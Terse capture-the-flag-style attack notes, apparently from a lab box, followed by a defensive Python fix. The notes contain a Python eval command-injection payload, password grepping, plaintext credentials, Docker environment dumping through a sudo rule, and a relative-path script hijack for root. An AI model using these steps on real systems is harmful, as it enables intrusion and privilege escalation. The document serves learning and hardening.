command injection via the query input, which is passed to eval
'+__import__('os').system("bla bla") )#
find cody's password with
grep -Ri cody
svc reuses the same password
~~jh1usoih2bkjaspwe92~~
we have a sudo rule for the script under /opt/scripts/. there's a repo, so maybe we can find the admin cred
list the containers
sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS       PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   3 months ago   Up 3 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   3 months ago   Up 3 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db
get env vars
sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' "9608" | jq
administrator on gitea shares password yuiu1hoiu4i5ho1uh
now we can see what the scripts do
sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
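it calls ./full-checkup.sh, a relative path, so it is looked up in whatever directory we run the command from
so just hijack it with our own full-checkup.sh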
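
the fix for that last step, as an added example (not code from the box or from these notes): resolve the helper next to the privileged script instead of the caller's working directory, and refuse it unless it is owned by the trusted uid and not group/world-writable. resolve_weak, resolve_hardened and the temp-dir layout are constructed for illustration; the real system-checkup.py source is not shown in these notes.

```python
import os
import stat
import tempfile

HELPER = "full-checkup.sh"  # helper name taken from the notes


def resolve_weak(cwd):
    """What './full-checkup.sh' means to the OS: relative to the caller's cwd."""
    return os.path.realpath(os.path.join(cwd, ".", HELPER))


def resolve_hardened(script_file, trusted_uid=0):
    """Resolve the helper next to the privileged script and vet it before use."""
    base = os.path.dirname(os.path.realpath(script_file))
    path = os.path.join(base, HELPER)
    for p in (base, path):
        st = os.stat(p)  # follows symlinks; raises if the helper is missing
        if st.st_uid != trusted_uid:
            raise PermissionError(f"{p}: not owned by uid {trusted_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{p}: group/world-writable")
    return path


def demo():
    """Constructed layout: an install dir and an unrelated caller directory."""
    root = os.path.realpath(tempfile.mkdtemp())
    install = os.path.join(root, "opt_scripts")
    caller = os.path.join(root, "caller_cwd")
    for d in (install, caller):
        os.mkdir(d, 0o755)
        with open(os.path.join(d, HELPER), "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(os.path.join(d, HELPER), 0o755)
    script = os.path.join(install, "system-checkup.py")
    weak = resolve_weak(caller)
    # trusted_uid is the current user here only so the demo runs unprivileged
    hard = resolve_hardened(script, trusted_uid=os.getuid())
    return install, caller, weak, hard


if __name__ == "__main__":
    install, caller, weak, hard = demo()
    print("weak     ->", weak)
    print("hardened ->", hard)
```

in a real sudo-invoked script trusted_uid stays 0, and the resolved absolute path is what gets passed to subprocess.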